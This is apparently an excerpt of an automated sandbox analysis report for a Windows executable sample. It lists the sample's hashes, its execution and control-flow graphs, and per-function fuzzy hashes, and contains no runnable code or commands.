                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                            Has elevated privileges:
                            Has administrator privileges:
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:16.9%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:100%
                              Total number of Nodes:3
                              Total number of Limit Nodes:0
                              execution_graph 10908 7fff60f60f3f 10909 7fff60f60f91 NtProtectVirtualMemory 10908->10909 10911 7fff60f61015 10909->10911

                              Executed Functions

                              Function 00007FFF60F60F3F Relevance: 1.6, APIs: 1, Instructions: 124nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f5a000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: ef2b47755fcd1ab3a7dc3526f555041f3c76300eebb8f040735534b114ff1cdb
                              • Instruction ID: 8d06e0755ef5e2c84e4615d1837278c90fa8b77564a554d3dd460f696ddef96f
                              • Opcode Fuzzy Hash: ef2b47755fcd1ab3a7dc3526f555041f3c76300eebb8f040735534b114ff1cdb
                              • Instruction Fuzzy Hash: FC31A331A1CB584FDB18DB5CA8066EE77E1EB99321F00466FE049D3246CF75A8458BC1
                              Function 00007FFF60F663B6 Relevance: .6, Instructions: 575COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f5a000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51a24ac2ecffdd14143de815bc844cf46ad10ef95f24253b294fee74ff4ebc55
                              • Instruction ID: efe3af4b048226f8d46ce934f99e716c535108b7a60332af70a2a1971537d292
                              • Opcode Fuzzy Hash: 51a24ac2ecffdd14143de815bc844cf46ad10ef95f24253b294fee74ff4ebc55
                              • Instruction Fuzzy Hash: 5212B320D2D3C28FEB6A973498161757BE4DF12314F6805BAF189C72E3ED1D780A9392
                              Function 00007FFF60F5B8C0 Relevance: .4, Instructions: 412COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f5a000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b3a3c34d3aca08d7469cb8f55bb006daaf592f617bfb1bbf65fdd899d74b123
                              • Instruction ID: ef04cdf03d39f5d5d5b66d927c50bff0ad86a9207a551daa3ad321dd3a35e5d3
                              • Opcode Fuzzy Hash: 2b3a3c34d3aca08d7469cb8f55bb006daaf592f617bfb1bbf65fdd899d74b123
                              • Instruction Fuzzy Hash: 8FC1B521D1D7878EF767932488561B97BE0DF72311F7909B6C889CB2D3DD0D280A83A2
                              Function 00007FFF60F5C012 Relevance: .3, Instructions: 339COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1786 7fff60f5c012-7fff60f5c015 1787 7fff60f5c016-7fff60f5c017 1786->1787 1788 7fff60f5c092-7fff60f5c099 1787->1788 1789 7fff60f5c018 1787->1789 1790 7fff60f5c0e3 1788->1790 1791 7fff60f5c09b-7fff60f5c0a5 1788->1791 1792 7fff60f5c048-7fff60f5c04c 1789->1792 1793 7fff60f5c019-7fff60f5c01f 1789->1793 1798 7fff60f5c0e5-7fff60f5c0ec 1790->1798 1799 7fff60f5c0a7-7fff60f5c0ae 1790->1799 1796 7fff60f5c0ce-7fff60f5c0d5 1791->1796 1797 7fff60f5c04d 1792->1797 1794 7fff60f5bfd1-7fff60f5bfd3 1793->1794 1795 7fff60f5c021 1793->1795 1805 7fff60f5c003-7fff60f5c009 1794->1805 1806 7fff60f5bfd5-7fff60f5bfda 1794->1806 1795->1794 1800 7fff60f5c023-7fff60f5c025 1795->1800 1801 7fff60f5c0dc-7fff60f5c0dd 1796->1801 1802 7fff60f5c0d7 1796->1802 1803 7fff60f5c04f-7fff60f5c050 1797->1803 1799->1796 1804 7fff60f5c0b0-7fff60f5c0b2 1799->1804 1800->1803 1809 7fff60f5c027 1800->1809 1801->1790 1802->1801 1810 7fff60f5c051-7fff60f5c064 1803->1810 1812 7fff60f5c0b4-7fff60f5c0b7 1804->1812 1813 7fff60f5c123-7fff60f5c125 1804->1813 1805->1787 1811 7fff60f5c00b 1805->1811 1807 7fff60f5c000-7fff60f5c002 1806->1807 1808 7fff60f5bfdc 1806->1808 1807->1805 1817 7fff60f5c032-7fff60f5c047 1807->1817 1808->1807 1814 7fff60f5bfde-7fff60f5bfe0 1808->1814 1809->1797 1815 7fff60f5c029-7fff60f5c030 1809->1815 1818 7fff60f5c066-7fff60f5c089 1810->1818 1811->1787 1819 7fff60f5c00d-7fff60f5c00f 1811->1819 1820 7fff60f5c138 1812->1820 1821 7fff60f5c0b9-7fff60f5c0c9 1812->1821 1816 7fff60f5c14e-7fff60f5c155 1813->1816 1814->1810 1822 7fff60f5bfe2-7fff60f5bfe5 1814->1822 1825 7fff60f5c15c-7fff60f5c163 1816->1825 1826 7fff60f5c157 1816->1826 1817->1792 1818->1788 1819->1795 1827 7fff60f5c011 1819->1827 1823 7fff60f5c17e-7fff60f5c189 1820->1823 1824 7fff60f5c139-7fff60f5c13c 1820->1824 1821->1796 1822->1818 1829 7fff60f5bfe7-7fff60f5bff9 1822->1829 1832 7fff60f5c1a3-7fff60f5c1b6 1823->1832 1830 7fff60f5c13d-7fff60f5c142 1824->1830 1833 7fff60f5c165-7fff60f5c16c 1825->1833 1834 7fff60f5c127-7fff60f5c12e 1825->1834 1826->1825 1827->1786 1829->1811 1842 7fff60f5bffb 1829->1842 1838 7fff60f5c149 1830->1838 1835 7fff60f5c1b8-7fff60f5c1c5 1832->1835 1834->1816 1837 7fff60f5c130-7fff60f5c132 1834->1837 1840 7fff60f5c1d7 1835->1840 1841 7fff60f5c1c7 1835->1841 1837->1832 1843 7fff60f5c134-7fff60f5c137 1837->1843 1838->1816 1845 7fff60f5c1e8-7fff60f5c1ea 1840->1845 1846 7fff60f5c1d9-7fff60f5c1e1 1840->1846 1844 7fff60f5c1cc-7fff60f5c1ce 1841->1844 1842->1807 1843->1820 1843->1835 1847 7fff60f5c1d0-7fff60f5c1d5 1844->1847 1848 7fff60f5c1fe-7fff60f5c1ff 1844->1848 1851 7fff60f5c1ec-7fff60f5c1f1 1845->1851 1852 7fff60f5c21a-7fff60f5c223 1845->1852 1849 7fff60f5c1f3 1846->1849 1850 7fff60f5c1e3 1846->1850 1847->1840 1847->1845 1853 7fff60f5c204-7fff60f5c206 1848->1853 1849->1853 1855 7fff60f5c1f5-7fff60f5c1fd 1849->1855 1850->1845 1851->1849 1851->1853 1852->1844 1856 7fff60f5c225 1852->1856 1859 7fff60f5c236-7fff60f5c239 1853->1859 1860 7fff60f5c208-7fff60f5c20d 1853->1860 1857 7fff60f5c20f 1855->1857 1858 7fff60f5c1ff 1855->1858 1856->1844 1863 7fff60f5c227-7fff60f5c235 1856->1863 1857->1852 1864 7fff60f5c211-7fff60f5c213 1857->1864 1858->1853 1861 7fff60f5c2b5-7fff60f5c2b9 1859->1861 1862 7fff60f5c23b 1859->1862 1860->1852 1860->1857 1869 7fff60f5c354-7fff60f5c35e 1861->1869 1867 7fff60f5c282 1862->1867 1868 7fff60f5c23d-7fff60f5c240 1862->1868 1865 7fff60f5c2a6-7fff60f5c2ab 1863->1865 1866 7fff60f5c237-7fff60f5c239 1863->1866 1864->1856 1870 7fff60f5c215 1864->1870 1872 7fff60f5c2b1-7fff60f5c2b2 1865->1872 1866->1861 1866->1862 1867->1865 1871 7fff60f5c242-7fff60f5c246 1868->1871 1868->1872 1878 7fff60f5c35f-7fff60f5c365 1869->1878 1870->1852 1873 7fff60f5c248-7fff60f5c259 1871->1873 1874 7fff60f5c2c7-7fff60f5c2df 1871->1874 1872->1861 1886 7fff60f5c260-7fff60f5c264 1873->1886 1876 7fff60f5c350-7fff60f5c353 1874->1876 1877 7fff60f5c2e1-7fff60f5c2e3 1874->1877 1876->1869 1877->1878 1880 7fff60f5c2e5 1877->1880 1881 7fff60f5c37e-7fff60f5c38e call 7fff60f5c3cb 1878->1881 1883 7fff60f5c32c-7fff60f5c337 1880->1883 1884 7fff60f5c2e7-7fff60f5c2eb 1880->1884 1889 7fff60f5c33d-7fff60f5c33f 1883->1889 1887 7fff60f5c2ed-7fff60f5c2fa 1884->1887 1888 7fff60f5c339 1884->1888 1887->1883 1888->1889 1890 7fff60f5c341-7fff60f5c349 call 7fff60f5c38f 1889->1890 1891 7fff60f5c34b-7fff60f5c34e call 7fff60f5c38f 1889->1891 1890->1881 1891->1876
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f5a000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 638121f90c5d31f32f5ca3bc26f32e8cf8b2ed658666dccbeb5d738287265770
                              • Instruction ID: ab2c5fdd6a53f6955155a6c82edfa4f9eda335e504df1753a318057994db78cd
                              • Opcode Fuzzy Hash: 638121f90c5d31f32f5ca3bc26f32e8cf8b2ed658666dccbeb5d738287265770
                              • Instruction Fuzzy Hash: FFB1C421D0C68A8EFB6B966488562B97BD0EF75300F7409BAD44ED73D3DD1C684A83D2
                              Function 00007FFF60F5CE70 Relevance: .1, Instructions: 144COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F5A000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f5a000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fdea764d76bc7e073db8ea14a6daf4bcb2dc6b764839c6bd3b390acaab3577d7
                              • Instruction ID: b8fe46d749dcc534bf828e76579a6f5b280c8e5a81d6f3460fcf66231adce434
                              • Opcode Fuzzy Hash: fdea764d76bc7e073db8ea14a6daf4bcb2dc6b764839c6bd3b390acaab3577d7
                              • Instruction Fuzzy Hash: B041A430D1E65A8FEBBBDB2884596B93BE0EF65300F6401B9D408C73D2EE696845C791
                              Function 00007FFF60F52918 Relevance: .8, Instructions: 817COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb7fd90e3448b560974b9e9b017c1166c39ff83849ccb24d98908f1dd2183199
                              • Instruction ID: b39b0dd54b8cb0224f264bf481a4df355000a306dc0fb3d30b96edda97bd99f8
                              • Opcode Fuzzy Hash: bb7fd90e3448b560974b9e9b017c1166c39ff83849ccb24d98908f1dd2183199
                              • Instruction Fuzzy Hash: BC528F21F1C90B9BFB96AB2C90A11BD26D2EFA8355FA14574D10DC73C6EF2DAD428341
                              Function 00007FFF60F52B45 Relevance: .3, Instructions: 342COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb251b57aa7bfd301d77d2ab69bb7a4d341ab5c7805c8de49eedf644d9f09630
                              • Instruction ID: 4fe7a3495e35ea190d961f8a4cdbd63740d0a9c8d91e4823a33144127f62dcfe
                              • Opcode Fuzzy Hash: eb251b57aa7bfd301d77d2ab69bb7a4d341ab5c7805c8de49eedf644d9f09630
                              • Instruction Fuzzy Hash: A6C17F21F1C9079BFB99A72890951BD26D3EFA9355FA14538D10DC77CAEF2DAD428300
                              Function 00007FFF60F53550 Relevance: .2, Instructions: 222COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2395 7fff60f53550-7fff60f53573 2396 7fff60f535a6-7fff60f535ad 2395->2396 2397 7fff60f535af-7fff60f535b8 2396->2397 2398 7fff60f535bd-7fff60f535c4 2396->2398 2397->2398 2399 7fff60f535c6-7fff60f535d1 2398->2399 2400 7fff60f535d9-7fff60f535e0 2398->2400 2401 7fff60f535d3-7fff60f535d4 2399->2401 2402 7fff60f5357e-7fff60f53589 2399->2402 2403 7fff60f535e2-7fff60f535e5 2400->2403 2404 7fff60f535ea-7fff60f535f1 2400->2404 2401->2400 2407 7fff60f5358f-7fff60f5359a 2402->2407 2408 7fff60f536ec-7fff60f53701 2402->2408 2403->2404 2405 7fff60f535f3-7fff60f535f6 2404->2405 2406 7fff60f5360b-7fff60f53612 2404->2406 2405->2408 2411 7fff60f535fc-7fff60f53606 2405->2411 2409 7fff60f53663-7fff60f53666 2406->2409 2410 7fff60f53614-7fff60f5361b 2406->2410 2412 7fff60f535a0-7fff60f535a1 2407->2412 2413 7fff60f5361d-7fff60f53620 2407->2413 2418 7fff60f53703-7fff60f53707 2408->2418 2419 7fff60f53709-7fff60f5372a 2408->2419 2409->2405 2416 7fff60f53668-7fff60f53669 2409->2416 2410->2413 2414 7fff60f53625-7fff60f5362c 2410->2414 2411->2406 2412->2396 2413->2414 2414->2399 2417 7fff60f5362e-7fff60f53635 2414->2417 2420 7fff60f5366e-7fff60f53675 2416->2420 2421 7fff60f5363f-7fff60f53646 2417->2421 2422 7fff60f53637-7fff60f5363a 2417->2422 2418->2419 2430 7fff60f53743-7fff60f5374a 2419->2430 2424 7fff60f536ad-7fff60f536b4 2420->2424 2425 7fff60f53677-7fff60f53682 2420->2425 2428 7fff60f53651-7fff60f53658 2421->2428 2429 7fff60f53648-7fff60f5364c 2421->2429 2422->2421 2426 7fff60f536b6-7fff60f536b9 2424->2426 2427 7fff60f536be-7fff60f536c5 2424->2427 2425->2408 2431 7fff60f53684-7fff60f5369d call 7fff60f50198 2425->2431 2426->2427 2432 7fff60f536cd-7fff60f536d4 2427->2432 2433 7fff60f536c7-7fff60f536c8 2427->2433 2428->2426 2434 7fff60f5365a-7fff60f53661 2428->2434 2429->2428 2436 7fff60f5374c call 7fff60f51640 2430->2436 2437 7fff60f5375a-7fff60f53761 2430->2437 2448 7fff60f536a4-7fff60f536a8 2431->2448 2441 7fff60f53575-7fff60f5357c 2432->2441 2442 7fff60f536da-7fff60f536eb 2432->2442 2433->2432 2434->2409 2434->2420 2444 7fff60f53751-7fff60f53753 2436->2444 2439 7fff60f53763 call 7fff60f51648 2437->2439 2440 7fff60f53771-7fff60f53778 2437->2440 2450 7fff60f53768-7fff60f5376a 2439->2450 2446 7fff60f53784-7fff60f5378b 2440->2446 2447 7fff60f5377a-7fff60f5377f call 7fff60f51280 2440->2447 2441->2396 2441->2402 2444->2447 2449 7fff60f53755 2444->2449 2452 7fff60f53792-7fff60f53799 2446->2452 2453 7fff60f5378d 2446->2453 2447->2446 2448->2424 2449->2437 2450->2447 2454 7fff60f5376c 2450->2454 2456 7fff60f5379b-7fff60f537a0 2452->2456 2457 7fff60f5372c-7fff60f53733 2452->2457 2453->2452 2454->2440 2457->2430 2458 7fff60f53735 call 7fff60f52588 2457->2458 2460 7fff60f5373a-7fff60f5373c 2458->2460 2460->2456 2461 7fff60f5373e 2460->2461 2461->2430
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1a4e91c89a739601e71050b548b85756b686bb609aa917c10ab20742ec23c243
                              • Instruction ID: 1a28a00f34c835cae0b88dd120dc91b67ce962c1f8c4fc6df6c547137cb10f08
                              • Opcode Fuzzy Hash: 1a4e91c89a739601e71050b548b85756b686bb609aa917c10ab20742ec23c243
                              • Instruction Fuzzy Hash: 8A51C131C2C46689F77A166CF4824F9A7C1EF69360FA540B8DDA9837C7AC1C6C9641C2
                              Function 00007FFF60F58635 Relevance: .2, Instructions: 199COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2462 7fff60f58635-7fff60f58659 2464 7fff60f5865b 2462->2464 2465 7fff60f5868e-7fff60f58695 call 7fff60f58078 2462->2465 2466 7fff60f58665-7fff60f5866c 2464->2466 2470 7fff60f5869a-7fff60f5869c 2465->2470 2468 7fff60f5867b-7fff60f58682 2466->2468 2469 7fff60f5866e-7fff60f5867a 2466->2469 2471 7fff60f58684-7fff60f58687 2468->2471 2472 7fff60f586a7-7fff60f586ae 2468->2472 2473 7fff60f587e0 2470->2473 2474 7fff60f586a2 2470->2474 2477 7fff60f587f5-7fff60f587fa 2471->2477 2478 7fff60f5868d 2471->2478 2475 7fff60f586b4-7fff60f586bb 2472->2475 2476 7fff60f587e2 2472->2476 2473->2476 2474->2472 2479 7fff60f587b5-7fff60f587bc 2475->2479 2480 7fff60f586c1-7fff60f586c3 2475->2480 2481 7fff60f587e5 2476->2481 2490 7fff60f587fb-7fff60f58839 2477->2490 2478->2465 2482 7fff60f587c5-7fff60f587cc 2479->2482 2483 7fff60f587be-7fff60f587c0 2479->2483 2484 7fff60f586d5-7fff60f5871c 2480->2484 2485 7fff60f586c5-7fff60f586d2 2480->2485 2481->2471 2486 7fff60f587eb-7fff60f587f4 2481->2486 2488 7fff60f587d3-7fff60f587da 2482->2488 2489 7fff60f587ce 2482->2489 2483->2482 2497 7fff60f5872e-7fff60f58746 2484->2497 2498 7fff60f5871e-7fff60f5872b 2484->2498 2485->2484 2488->2466 2488->2473 2489->2488 2503 7fff60f58758-7fff60f58770 2497->2503 2504 7fff60f58748-7fff60f58755 2497->2504 2498->2497 2508 7fff60f58782-7fff60f58786 2503->2508 2509 7fff60f58772-7fff60f5877e 2503->2509 2504->2503 2508->2490 2510 7fff60f58787 2508->2510 2513 7fff60f58790-7fff60f587b0 2509->2513 2514 7fff60f58780 2509->2514 2510->2481 2512 7fff60f58788-7fff60f5878d 2510->2512 2512->2513 2513->2479 2514->2508
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2eac4da12c9be7237c8254e403d549d2520e48fa6101bd74226c94e77a7dee42
                              • Instruction ID: 8abc132f817584c74aec0755cfc6b978b9186fd9f72eeb26a1110ff61bbce3a8
                              • Opcode Fuzzy Hash: 2eac4da12c9be7237c8254e403d549d2520e48fa6101bd74226c94e77a7dee42
                              • Instruction Fuzzy Hash: 9151F421A2E6878FF702A37898952B53BD0EF6A310F2801F6D549C73D3ED4C68478392
                              Function 00007FFF60F56EC0 Relevance: .2, Instructions: 189COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2587 7fff60f56ec0-7fff60f56ef0 2590 7fff60f56ef2-7fff60f56efc 2587->2590 2591 7fff60f56f5e 2587->2591 2590->2591 2592 7fff60f56efe-7fff60f56f0b 2590->2592 2593 7fff60f56f60-7fff60f56f89 2591->2593 2594 7fff60f56f44-7fff60f56f5c 2592->2594 2595 7fff60f56f0d-7fff60f56f1f 2592->2595 2600 7fff60f56ff3 2593->2600 2601 7fff60f56f8b-7fff60f56f96 2593->2601 2594->2593 2596 7fff60f56f23-7fff60f56f36 2595->2596 2597 7fff60f56f21 2595->2597 2596->2596 2599 7fff60f56f38-7fff60f56f40 2596->2599 2597->2596 2599->2594 2602 7fff60f56ff5-7fff60f57086 2600->2602 2601->2600 2603 7fff60f56f98-7fff60f56fa6 2601->2603 2611 7fff60f5708c-7fff60f5709b 2602->2611 2604 7fff60f56fdf-7fff60f56ff1 2603->2604 2605 7fff60f56fa8-7fff60f56fba 2603->2605 2604->2602 2607 7fff60f56fbc 2605->2607 2608 7fff60f56fbe-7fff60f56fd1 2605->2608 2607->2608 2608->2608 2609 7fff60f56fd3-7fff60f56fdb 2608->2609 2609->2604 2612 7fff60f570a3-7fff60f570b5 2611->2612 2613 7fff60f5709d 2611->2613 2613->2612
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4eb68301f916bfe0735cd67954df41e52c99f8d729493ea70b39b5a376a57a94
                              • Instruction ID: af40b192173842b19995afe96ccd4ecf5fc738253c73f4e1fdb69f9fc15913c2
                              • Opcode Fuzzy Hash: 4eb68301f916bfe0735cd67954df41e52c99f8d729493ea70b39b5a376a57a94
                              • Instruction Fuzzy Hash: 36516030918A4E8FEBA9DF28D8457A977D1FF68300F14822EE85DC3395DF3499458B82
                              Function 00007FFF60F5456A Relevance: .2, Instructions: 187COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2615 7fff60f5456a-7fff60f54627 2619 7fff60f54635-7fff60f54649 2615->2619 2620 7fff60f54629-7fff60f54632 2615->2620 2621 7fff60f54651-7fff60f54668 2619->2621 2620->2619 2622 7fff60f5466f-7fff60f546b9 2621->2622 2623 7fff60f546bf-7fff60f546d1 2622->2623 2624 7fff60f546d3 2623->2624 2625 7fff60f546d9-7fff60f5473d call 7fff60f5473e 2623->2625 2624->2625
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bd0407169f2e052e3cda540a5d9fd4f27930a05fb16f76c73bd1502ad7ecbea6
                              • Instruction ID: 931337578558fe2ccf9aba16cab4354dcf957908af8255c2fa4d26e1810f2f8c
                              • Opcode Fuzzy Hash: bd0407169f2e052e3cda540a5d9fd4f27930a05fb16f76c73bd1502ad7ecbea6
                              • Instruction Fuzzy Hash: 95514D71918A1C8FDB98DF58D845BE9BBF1FB59310F1082AAD00DE3252DF34A9858F81
                              Function 00007FFF60F56929 Relevance: .2, Instructions: 185COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2631 7fff60f56929-7fff60f56959 2634 7fff60f5695b-7fff60f56965 2631->2634 2635 7fff60f569c7 2631->2635 2634->2635 2637 7fff60f56967-7fff60f56974 2634->2637 2636 7fff60f569c9-7fff60f569f2 2635->2636 2643 7fff60f569f4-7fff60f569ff 2636->2643 2644 7fff60f56a5c 2636->2644 2638 7fff60f56976-7fff60f56988 2637->2638 2639 7fff60f569ad-7fff60f569c5 2637->2639 2641 7fff60f5698c-7fff60f5699f 2638->2641 2642 7fff60f5698a 2638->2642 2639->2636 2641->2641 2645 7fff60f569a1-7fff60f569a9 2641->2645 2642->2641 2643->2644 2646 7fff60f56a01-7fff60f56a0f 2643->2646 2647 7fff60f56a5e-7fff60f56ae3 2644->2647 2645->2639 2648 7fff60f56a11-7fff60f56a23 2646->2648 2649 7fff60f56a48-7fff60f56a5a 2646->2649 2655 7fff60f56ae9-7fff60f56af8 2647->2655 2650 7fff60f56a25 2648->2650 2651 7fff60f56a27-7fff60f56a3a 2648->2651 2649->2647 2650->2651 2651->2651 2653 7fff60f56a3c-7fff60f56a44 2651->2653 2653->2649 2656 7fff60f56b00-7fff60f56b12 2655->2656 2657 7fff60f56afa 2655->2657 2657->2656
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e62d3020eb72bd575388c2fedb69f250571052534fd2a3d82fa3c5120bb05b80
                              • Instruction ID: f6dc84a2bbeba05ecfe5a1afce2f6388ec7c7fc14624f79ad6f83b9ec14b3e6a
                              • Opcode Fuzzy Hash: e62d3020eb72bd575388c2fedb69f250571052534fd2a3d82fa3c5120bb05b80
                              • Instruction Fuzzy Hash: 6151943091CA498BEB69DF28D8457B977E1FF68301F14822EE85DC7395CF38A5458B82
                              Function 00007FFF60F57717 Relevance: .2, Instructions: 182COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2659 7fff60f57717-7fff60f57751 2662 7fff60f57753-7fff60f5775d 2659->2662 2663 7fff60f577bf 2659->2663 2662->2663 2665 7fff60f5775f-7fff60f5776c 2662->2665 2664 7fff60f577c1-7fff60f577ea 2663->2664 2671 7fff60f57854 2664->2671 2672 7fff60f577ec-7fff60f577f7 2664->2672 2666 7fff60f577a5-7fff60f577bd 2665->2666 2667 7fff60f5776e-7fff60f57780 2665->2667 2666->2664 2669 7fff60f57784-7fff60f57797 2667->2669 2670 7fff60f57782 2667->2670 2669->2669 2673 7fff60f57799-7fff60f577a1 2669->2673 2670->2669 2675 7fff60f57856-7fff60f578c7 2671->2675 2672->2671 2674 7fff60f577f9-7fff60f57807 2672->2674 2673->2666 2676 7fff60f57840-7fff60f57852 2674->2676 2677 7fff60f57809-7fff60f5781b 2674->2677 2683 7fff60f578cd-7fff60f578dc 2675->2683 2676->2675 2678 7fff60f5781f-7fff60f57832 2677->2678 2679 7fff60f5781d 2677->2679 2678->2678 2681 7fff60f57834-7fff60f5783c 2678->2681 2679->2678 2681->2676 2684 7fff60f578e4-7fff60f578f6 2683->2684 2685 7fff60f578de 2683->2685 2685->2684
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F56000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F56000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f56000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0168aa9a5f674069875f6ee5ea44858dd72e0c8fceff0be7305735de5de086c8
                              • Instruction ID: 68a230cbb25d63b660601a84b5df080b11b5b59b8536b5900f29f6151eebe2a8
                              • Opcode Fuzzy Hash: 0168aa9a5f674069875f6ee5ea44858dd72e0c8fceff0be7305735de5de086c8
                              • Instruction Fuzzy Hash: 3E51A130608A4A8FEB69DF28E8453E977D1FF58301F14826ED84DC7395DF3899458B82
                              Function 00007FFF60F5457F Relevance: .2, Instructions: 179COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2728 7fff60f5457f-7fff60f54627 2731 7fff60f54635-7fff60f546b9 2728->2731 2732 7fff60f54629-7fff60f54632 2728->2732 2735 7fff60f546bf-7fff60f546d1 2731->2735 2732->2731 2736 7fff60f546d3 2735->2736 2737 7fff60f546d9-7fff60f5473d call 7fff60f5473e 2735->2737 2736->2737
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: de91f618111028d0046b2d8560ed169c9bba1ed3f632bac4470f8744ce7512ff
                              • Instruction ID: 7d10f2fba4cb9ec6152a29a272a286a500cabc623af201382df82b049a011d89
                              • Opcode Fuzzy Hash: de91f618111028d0046b2d8560ed169c9bba1ed3f632bac4470f8744ce7512ff
                              • Instruction Fuzzy Hash: 9A512E71918A1C8FDBA8DF58D845BE9BBF1FB58310F1082AAD40DE3255DF34A9858F81
                              Function 00007FFF60F52FEA Relevance: .2, Instructions: 161COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3342975739.00007FFF60F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7fff60f50000_ptKNiAaGus.jbxd
                              Similarity
                              • API ID:
